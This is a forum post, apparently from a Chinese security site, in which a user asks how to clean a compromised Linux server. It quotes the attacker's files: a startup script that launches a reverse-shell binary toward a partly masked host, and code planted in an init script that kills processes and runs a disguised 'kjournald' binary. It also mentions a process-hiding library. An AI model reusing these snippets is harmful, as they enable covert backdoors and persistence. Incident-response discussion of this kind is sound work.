朋友的机器脱管有5~6年了,今天突然发现内网异常。
锁定来源后,发现此机已做为登录入口。
目前在此机上发现有一些像是后门的文件如下:
ch1n4in_cmd ch1n4in.ko ch1n4in_rc ch1n4in_reverse ch1n4in_start
其中ch1n4in_start内容如下
#!/bin/bash
#<gogodisplay>
/ch1n4in/ch1n4in_reverse -t xxx.ccc .cc -p 16283 -s xxxxxx -r 60 —–关键地方手工打码
#/ch1n4in/ch1n4in_cmd hide `ps -ef | grep “ata/0” | grep -v grep | awk ‘{print $2}’`
/ch1n4in/ch1n4in_cmd file-tampering
#</gogodisplay>
这个到没什么,最重要的是发现如下异常现像
小哥修改了 /etc/ld.so.conf/或 /etc/ld.so.preload 增加了进程隐藏功能
增加/usr/local/lib/libprocesshider.so
同时修改了
/etc/rc.d/init.d/functions
增加如下内容
ps -ef|grep kondemand:0|grep -v grep|cut -c 9-15|xargs kill -9 1>/dev/null 2>/dev/null
PIDS=`ls -la /usr/bin/|grep kjournald| awk ‘{print $2}’`
if [ “$PIDS” != “” ]; then
/usr/bin/kjournald -D >/dev/null
else
\cp -p /usr/local/php/php-cli /usr/bin/kjournald -f 1>/dev/null 2>/dev/null
/usr/bin/kjournald -e 0 >/dev/null
fi
同时也增加了文件/usr/bin/kjournald和/usr/local/php/php-cli
当前只是临时修改了弱口令,升级了系统内核,手工清理掉上面的 、/usr/bin/kjournald /usr/local/php/php-cli 和相关联的 /usr/local/lib/libprocesshider.so
那么问题来了
1、ch1n4in 像是一个反弹后门,能直接清除吗?
2、kjournald和php-cli及libprocesshider.so 除了隐藏进程外,还有什么作用,是否修改了内核?
对这两种程序不了解,不知手工是否清理干净。
来源:freebuf.com 2021-03-05 17:13:20 by: 49566258
请登录后发表评论
注册